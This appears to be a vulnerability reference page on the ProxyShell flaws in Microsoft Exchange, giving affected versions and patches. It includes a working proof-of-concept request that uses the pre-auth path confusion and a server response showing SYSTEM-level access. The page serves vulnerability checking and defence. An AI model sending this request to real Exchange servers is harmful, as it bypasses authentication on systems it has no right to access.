CVE

CVE-2021-34473 / CVE-2021-34523 / CVE-2021-31207 | ProxyShell

CVE-2021-34473 Pre-auth path confusion vulnerability to bypass access control Patched in KB5001779, released in April

CVE-2021-34523 Privilege elevation vulnerability in the Exchange PowerShell backend Patched in KB5001779, released in April

CVE-2021-31207 Post-auth remote code execution via arbitrary file write Patched in KB5003435, released in May

This vulnerability affects:

  • Exchange 2013 CU23 < 15.0.1497.15
  • Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5
  • Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9

Examples

Validating POC

https://<<ip>>/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
GET /autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected] HTTP/1.1
Host: exch.offsec.nl
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
request-id: af2ae0ee-6593-4523-8fa1-5d283d7ae3da
X-CalculatedBETarget: exch.offsec.nl
X-ServerApplication: Exchange/15.01.1913.012
X-DiagInfo: EXCH
X-BEServer: EXCH
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 25-Aug-1991 07:43:18 GMT; path=/autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: EXCH
Date: Wed, 25 Aug 2021 07:43:17 GMT
Connection: close
Content-Length: 522

<html>
<head>
<title>Exchange MAPI/HTTP Connectivity Endpoint</title>
</head>
<body>
<p>Exchange MAPI/HTTP Connectivity Endpoint<br><br>Version: 15.1.1913.12<br>Vdir Path: /mapi/nspi/<br><br></p><p><b>User:</b> NT AUTHORITY\SYSTEM<br><b>UPN:</b> <br><b>SID:</b> S-1-5-18<br><b>Organization:</b> <br><b>Authentication:</b> Negotiate<br><b>PUID:</b> <br><b>TenantGuid::</b> </p><br><p><b>Cafe:</b> exch.offsec.nl<br><b>Mailbox:</b> exch.offsec.nl</p><p><br><br><br><b>Created:</b> 25-8-2021 07:43:18</p></body></html>

URL list